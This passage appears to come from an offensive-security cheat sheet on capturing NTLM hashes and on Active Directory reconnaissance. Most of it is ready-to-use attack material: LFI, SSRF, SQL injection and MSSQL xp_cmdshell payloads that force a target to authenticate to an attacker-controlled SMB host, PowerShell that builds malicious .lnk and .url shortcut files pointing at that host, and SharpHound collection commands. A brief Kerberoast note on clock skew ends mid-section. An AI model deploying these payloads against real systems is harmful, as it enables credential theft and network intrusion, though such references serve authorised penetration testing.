If you discover a web vulnerability (such as LFI, SQLI, XXE, SSRF, SSTI) that allows you to include remote files, you can exploit it to steal the NTLM hash of the user running the process. For example:
# LFI?page=\\10.10.10.10\test# SSRF?url=file://10.10.10.10/test# SQL Injection?id=1' union select null,load_file('\\\\10.10.10.10\\test'),null-- -# MSSQL?id=1' union select null,(select x from OpenRowset(BULK '\\10.10.10.10\test',SINGLE_CLOB) R(x)),null---?id=1' union select null,(EXEC xp_cmdshell 'dir \\10.10.10.10\test'),null-- -
Shortcut.lnk File
# Create a shortcut.lnk with PowerShell$targetPath ="\\10.10.10.10\test"$shortcutPath ="C:\path\to\your\~shortcut.lnk"$WScriptShell =New-Object-ComObject WScript.Shell $shortcut = $WScriptShell.CreateShortcut($shortcutPath) $shortcut.TargetPath = $targetPath $shortcut.Save()
Shortcut.url File
# Create a shortcut.url with PowerShellecho '[InternetShortcut]'> ~shortcut.urlecho 'URL=file:///\\10.10.10.10\test'>> ~shortcut.url
# EXE.\SharpHound.exe-CollectionMethods All# PS1. .\SharpHound.ps1Invoke-BloodHound-CollectionMethods All -OutputDirectory .
Kerberoast
If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it's because of your local time, you need to synchronise the host with the DC. There are a few options: